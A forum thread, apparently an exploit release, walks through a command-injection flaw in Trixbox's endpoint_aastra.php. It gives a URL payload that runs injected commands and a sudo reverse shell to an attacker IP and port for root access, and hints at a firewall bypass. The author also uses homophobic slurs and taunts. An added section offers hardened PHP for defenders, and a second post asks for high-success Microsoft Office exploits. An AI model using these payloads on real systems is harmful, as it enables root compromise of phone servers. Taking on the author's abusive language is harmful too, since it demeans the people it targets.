    How do we Exploit.
    #1
    # App : Trixbox all versions
    # vendor : trixbox.com
    # Author : i-Hmx
    # mail : n0p1337@gmail.com
    # Home : security arrays inc , sec4ever.com ,exploit4arab.net

    Well well well , we decided to give schmoozecom a break and have a look @
    fonality products
    do you think they have better product than the (Award winning) trixbox!!!
    I don't think com
    "Designed and marketed for Fonality's partner community, trixbox Pro is an
    IP-PBX software solution purpose built to support growing SMB businesses.
    A unique hybrid hosted telephony solution; trixbox Pro provides big
    business features at an SMB cost . . blah blah blah"
    What do we have here??
    A 3 years old Sql injection flaw???
    not big deal , and already been reported
    not enough good exploitation , but reported
    A file disclosure flaw???
    save it for later
    let's give Fonality little Remote root Exploit xD
    and also give the "Predictors" some pain in the ass trying to exploit this
    consider it as challenge Wink
    Here we go
    Vulnerable file :
    /var/www/html/maint/modules/endpointcfg/endpoint_aastra.php
    Piece of shit , sorry i mean code

    switch($_action) {
    case 'Edit':
        if ($_REQUEST['newmac']){ // create a new phone from device map
            $mac_address = $_REQUEST['newmac'];
        }
        if ($_REQUEST['mac']){
            $phoneinfo = GetPhone($_REQUEST['mac'],$PhoneType);
            $mac_address=$phoneinfo['mac_address'];
        } // if there is a request ID we Edit otherwise add a new phone

        $freepbx_device_list = GetFreepbxDeviceList();
        $smarty->assign("mac_address", $mac_address);
        $smarty->assign("phone", $phoneinfo);
        $smarty->assign("freepbx_device_list", $freepbx_device_list);

        $smarty->assign("message", $message);
        $template = "endpoint_".$PhoneType."_edit.tpl";
        break;

    case 'Delete':
        exec("rm ".$sipdir.$_REQUEST['mac'].".cfg");
        getSQL("DELETE FROM ".$PhoneType." WHERE mac_address='".$_REQUEST['mac']."'",'endpoints');
        $smarty->assign("phones", ListPhones($PhoneType));
        $template = "endpoint_".$PhoneType."_list.tpl";
        break;

    it's obvious we care about this line
    >>>exec("rm ".$sipdir.$_REQUEST['mac'].".cfg");<<<
    Exploitation demo :
    maint/modules/endpointcfg/endpoint_aastra.php?action=Delete&mac=fa;echo
    id>xx;faris
    result will be written to xx
    but this is not the full movie yet ,
    Am here to give fonality a nightmare , which take the form of "root"
    privzz
    actually the server is configured by default to allow the web interface
    pages to edit many files @ the root directory
    com any noob can easily execute the "sudo fuck" without being permitted for
    password , and the result is > root
    Demo

    maint/modules/endpointcfg/endpoint_aastra.php?action=Delete&mac=fa;sudo
    bash -i >%26 %2fdev%2ftcp%2fxxx.xxx.xxx.xxx%2f1337 0>%261;faris
    change to your ip and the port you are listening to
    and , Voila , you are root
    now am sure you're happy as pig in shit xD
    Still need more??
    you will notice that you're unable to reach this file due to the http
    firewall
    but actually there is simple and yet dirty trick that allow you to get pass
    through it , and execute your command smooooothely as boat on the river Wink
    And here come the challenge , let's see what the faggots can do with this Wink
    need hint???
    use your mind and fuck off :/

    Big greets fly to the all sec4ever family
    oh , and for voip lames , you can use our 0Days for sure
    but once it become 720Days xD
    Regards,
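
For defenders, a hardened form of the 'Delete' case quoted in the post above, as an added example that is not part of the original post or of trixbox's code. The names valid_mac(), delete_phone() and $allowedTypes, the 12-hex-digit MAC format, and the use of PDO in place of the page's getSQL() are assumptions.

```php
<?php
declare(strict_types=1);

// Assumption: a MAC is stored as 12 hex digits with no separators,
// so that is the only shape accepted; everything else is rejected.
function valid_mac(string $raw): bool
{
    return preg_match('/\A[0-9A-Fa-f]{12}\z/', $raw) === 1;
}

// Hypothetical replacement for the 'Delete' case. $db is a PDO handle
// to the endpoints database (assumption; the quoted code uses getSQL()).
function delete_phone(PDO $db, string $sipdir, string $phoneType, string $rawMac): bool
{
    // Table names cannot be bound as parameters, so allowlist them.
    $allowedTypes = ['aastra'];   // assumption: known endpoint tables
    if (!in_array($phoneType, $allowedTypes, true) || !valid_mac($rawMac)) {
        return false;             // reject before touching disk or SQL
    }

    // Remove the file with a filesystem call; no shell is involved.
    $path = rtrim($sipdir, '/') . '/' . $rawMac . '.cfg';
    if (is_file($path) && !unlink($path)) {
        return false;
    }

    // Bound parameter instead of string concatenation.
    $stmt = $db->prepare("DELETE FROM {$phoneType} WHERE mac_address = :mac");
    return $stmt->execute([':mac' => $rawMac]);
}

// Constructed demo data: in-memory SQLite and a temporary directory.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE aastra (mac_address TEXT)");
$db->exec("INSERT INTO aastra VALUES ('00085D1A2B3C')");
$dir = sys_get_temp_dir() . '/sipdemo_' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents("$dir/00085D1A2B3C.cfg", "constructed\n");

// First call passes the 'mac' value from the post's demo URL, second a well-formed MAC.
var_dump(delete_phone($db, $dir, 'aastra', 'fa;echo id>xx;faris'));
var_dump(delete_phone($db, $dir, 'aastra', '00085D1A2B3C'));
```

Validation closes the injection in this handler only; the passwordless sudo that the post describes for the web interface is a separate configuration issue that input checks do not address.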
    #2
    I need microsoft office exploits with high execution rate. Let me know if you got this.
    Thanks
    David